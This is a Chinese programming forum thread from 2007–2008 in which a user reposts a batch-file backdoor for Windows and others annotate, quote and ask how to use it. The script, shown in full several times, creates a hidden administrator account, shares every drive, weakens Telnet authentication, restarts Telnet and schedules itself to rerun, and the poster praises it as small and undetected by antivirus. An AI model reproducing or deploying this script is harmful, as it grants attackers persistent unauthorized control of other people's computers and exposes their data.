标题:[转载]用批处理写的后门
只看楼主
WSY379
Rank: 6Rank: 6
来 自:网络农民
等 级:贵宾
威 望:28
帖 子:1293
专家分:3
注 册:2007-6-24
结帖率:100%
 问题点数:0 回复次数:9 
[转载]用批处理写的后门

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
可惜这个批处理不能用在Windows Vista的系统上和Windows Server Edition 2003上 可惜,实在是可惜!
虽然在Windows Server Edition 2003下在改一下路径是可以实现后门功能,但在Windows Vista下就用不了了,真是可惜!

搜索更多相关主题的帖子: 批处理 后门 share xyt echo 
2007-09-13 22:50
cnenc
Rank: 7Rank: 7Rank: 7
等 级:贵宾
威 望:35
帖 子:2913
专家分:514
注 册:2007-1-29
得分:0 
开telnet服务?
2007-09-17 16:47
redice
Rank: 3Rank: 3
等 级:新手上路
威 望:6
帖 子:902
专家分:0
注 册:2006-12-11
得分:0 

@echo off
@attrib +s + r xyt.bat '将xyt.bat文件设置为 “只读+系统” 属性
@net user xyt hacker /add
@net localgroup administrators xyt /add ‘前面两句 添加一个名字为hacker的用户 并添加到管理员组
@net share c$=c: @net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h: ’共享 c,d,e,f,g,g盘
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule ‘前两句 重启 “计划任务”服务
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet ’前两句:重启telnet服务
@exit


鲲鹏数据 - 专业Web数据采集服务提供者
http://www.
2007-09-28 22:55
lthiy
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:9
帖 子:849
专家分:0
注 册:2007-4-4
得分:0 
看看
呵呵

2007-09-29 12:48
czjt1234
Rank: 1
等 级:新手上路
威 望:1
帖 子:41
专家分:0
注 册:2007-9-29
得分:0 
以下是引用WSY379在2007-9-13 22:50:16的发言:

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
可惜这个批处理不能用在Windows Vista的系统上和Windows Server Edition 2003上 可惜,实在是可惜!
虽然在Windows Server Edition 2003下在改一下路径是可以实现后门功能,但在Windows Vista下就用不了了,真是可惜!

只有第一行要@

后面的每行开头的@都可以删掉


2007-09-30 06:55
guotaolovewen
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2008-3-1
得分:0 
用什么语言编写
用什么语言编写的
2008-03-01 12:20
absentlyh
Rank: 2
等 级:论坛游民
帖 子:105
专家分:14
注 册:2006-6-5
得分:0 
这个后门怎么用

我就是我!我自信,我成功!
2008-05-27 13:30
vfdff
Rank: 6Rank: 6
等 级:侠之大者
威 望:8
帖 子:2172
专家分:425
注 册:2005-7-15
得分:0 
回复 5# czjt1234 的帖子
可以删除的意思 就是也可以保留
2008-06-06 18:24
cosdos
Rank: 9Rank: 9Rank: 9
来 自:ShangHai
等 级:蜘蛛侠
威 望:6
帖 子:2109
专家分:1385
注 册:2007-6-19
得分:0 
[bo][un]guotaolovewen[/un] 在 2008-3-1 12:20 的发言:[/bo]

用什么语言编写的



批处理脚本文件

命令

—>〉Sun〈<—
2008-06-18 01:48
jxyga111
Rank: 8Rank: 8
来 自:中華人民共和國
等 级:贵宾
威 望:33
帖 子:6015
专家分:895
注 册:2008-3-21
得分:0 
你们怎么这么懂脚本啊可否教一下

烈焰照耀世界,斌凍凍千萬裏
2008-06-20 08:48



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-169798-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.416677 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved